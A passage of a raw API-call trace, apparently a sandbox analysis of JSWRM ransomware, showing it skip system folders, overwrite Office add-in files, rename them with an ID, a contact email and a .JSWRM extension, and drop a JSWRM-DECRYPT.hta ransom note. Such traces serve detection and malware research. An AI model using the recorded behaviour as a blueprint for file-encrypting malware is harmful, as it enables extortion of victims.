(lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="...") returned 1 [0124.421] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="windows") returned -1 [0124.421] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0124.421] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0124.421] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0124.421] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.421] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0124.421] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0124.421] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0124.422] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0124.422] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0124.422] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d0a0, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0124.422] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0124.422] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0124.422] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0124.422] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0124.422] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0124.422] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0124.422] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0124.422] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dd70 | out: hHeap=0x1e0000) returned 1 [0124.422] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0124.422] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0124.422] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6aef645, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6aef645, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6b15891, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13078, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0124.422] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2=".") returned 1 [0124.422] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="..") returned 1 [0124.422] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="...") returned 1 [0124.422] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="windows") returned -1 [0124.422] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="recovery") returned -1 [0124.422] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="perflogs") returned -1 [0124.422] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="documents and settings") returned 1 [0124.422] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.422] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="system volume information") returned -1 [0124.422] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="msocache") returned -1 [0124.422] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0124.422] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.422] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0124.422] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d800, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.422] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0124.422] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224c40 [0124.422] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.422] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0124.422] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dba8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.422] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224c40 | out: hHeap=0x1e0000) returned 1 [0124.422] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f4d0 [0124.423] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0124.423] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0124.423] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0124.423] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5afc9d3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf5afc9d3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf5e43de4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4e40, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0124.423] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2=".") returned 1 [0124.423] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="..") returned 1 [0124.423] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="...") returned 1 [0124.423] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="windows") returned -1 [0124.423] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="recovery") returned -1 [0124.423] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="perflogs") returned -1 [0124.423] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="documents and settings") returned 1 [0124.423] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.423] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="system volume information") returned -1 [0124.423] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="msocache") returned -1 [0124.423] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0124.423] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.423] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0124.423] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d698, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.423] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0124.423] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0124.423] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.423] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0124.423] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.423] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0124.423] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f5f8 [0124.423] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0124.423] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0124.423] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0124.423] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x14ac0994, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x14ac0994, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x14bcb9e3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4eec6, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.ko.xap", cAlternateFileName="POWERV~1.XAP")) returned 1 [0124.423] lstrcmpiW (lpString1="PowerViewRes.ko.xap", lpString2=".") returned 1 [0124.423] lstrcmpiW (lpString1="PowerViewRes.ko.xap", lpString2="..") returned 1 [0124.423] lstrcmpiW (lpString1="PowerViewRes.ko.xap", lpString2="...") returned 1 [0124.423] lstrcmpiW (lpString1="PowerViewRes.ko.xap", lpString2="windows") returned -1 [0124.424] lstrcmpiW (lpString1="PowerViewRes.ko.xap", lpString2="recovery") returned -1 [0124.424] lstrcmpiW (lpString1="PowerViewRes.ko.xap", lpString2="perflogs") returned 1 [0124.424] lstrcmpiW (lpString1="PowerViewRes.ko.xap", lpString2="documents and settings") returned 1 [0124.424] lstrcmpiW (lpString1="PowerViewRes.ko.xap", lpString2="$RECYCLE.BIN") returned 1 [0124.424] lstrcmpiW (lpString1="PowerViewRes.ko.xap", lpString2="system volume information") returned -1 [0124.424] lstrcmpiW (lpString1="PowerViewRes.ko.xap", lpString2="msocache") returned 1 [0124.424] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0124.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.ko.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0124.424] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0124.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.ko.xap", cchWideChar=19, lpMultiByteStr=0x240fc0, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.ko.xap", lpUsedDefaultChar=0x0) returned 19 [0124.424] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0124.424] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0124.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.ko.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0124.424] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0124.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.ko.xap", cchWideChar=19, lpMultiByteStr=0x241268, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.ko.xap", lpUsedDefaultChar=0x0) returned 19 [0124.424] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0124.424] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f1b0 [0124.424] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0124.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0124.424] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0124.424] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0124.424] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ko\\PowerViewRes.ko.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ko\\powerviewres.ko.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0124.425] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=323270) returned 1 [0124.425] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.425] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24f1e0 [0124.425] ReadFile (in: hFile=0x338, lpBuffer=0x24f1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesRead=0x345e1cc*=0x27100, lpOverlapped=0x0) returned 1 [0124.441] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.441] WriteFile (in: hFile=0x338, lpBuffer=0x24f1e0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesWritten=0x345e1c8*=0x27100, lpOverlapped=0x0) returned 1 [0124.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0124.441] CloseHandle (hObject=0x338) returned 1 [0124.441] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e0d0 [0124.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0124.441] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0124.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0124.441] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0124.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0124.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0124.441] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0124.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0124.441] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0124.441] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0124.442] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0124.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0124.442] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0124.442] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ko\\PowerViewRes.ko.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ko\\powerviewres.ko.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\ko\\PowerViewRes.ko.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\ko\\powerviewres.ko.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0124.443] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0124.443] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e0d0 | out: hHeap=0x1e0000) returned 1 [0124.443] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0124.443] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0124.443] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0124.443] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x14ac0994, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x14ac0994, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x14bcb9e3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4eec6, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.ko.xap", cAlternateFileName="POWERV~1.XAP")) returned 0 [0124.443] FindClose (in: hFindFile=0x232080 | out: hFindFile=0x232080) returned 1 [0124.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f1b0 | out: hHeap=0x1e0000) returned 1 [0124.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0124.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0124.444] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7b529d9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x152a6704, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x152a6704, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="lt", cAlternateFileName="")) returned 1 [0124.444] lstrcmpiW (lpString1="lt", lpString2=".") returned 1 [0124.444] lstrcmpiW (lpString1="lt", lpString2="..") returned 1 [0124.444] lstrcmpiW (lpString1="lt", lpString2="...") returned 1 [0124.444] lstrcmpiW (lpString1="lt", lpString2="windows") returned -1 [0124.444] lstrcmpiW (lpString1="lt", lpString2="recovery") returned -1 [0124.444] lstrcmpiW (lpString1="lt", lpString2="perflogs") returned -1 [0124.444] lstrcmpiW (lpString1="lt", lpString2="documents and settings") returned 1 [0124.444] lstrcmpiW (lpString1="lt", lpString2="$RECYCLE.BIN") returned 1 [0124.444] lstrcmpiW (lpString1="lt", lpString2="system volume information") returned -1 [0124.444] lstrcmpiW (lpString1="lt", lpString2="msocache") returned -1 [0124.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0124.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0124.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0124.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0124.444] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dff8 [0124.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0124.444] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\lt\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\lt\\jswrm-decrypt.hta")) returned 0xffffffff [0124.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0124.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0124.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0124.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0124.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24e1d8 [0124.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0124.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24ffa8 [0124.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0124.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0124.446] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e570 [0124.446] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0124.446] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\lt\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\lt\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0124.447] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.447] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0124.448] CloseHandle (hObject=0x314) returned 1 [0124.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e570 | out: hHeap=0x1e0000) returned 1 [0124.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ffa8 | out: hHeap=0x1e0000) returned 1 [0124.448] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | 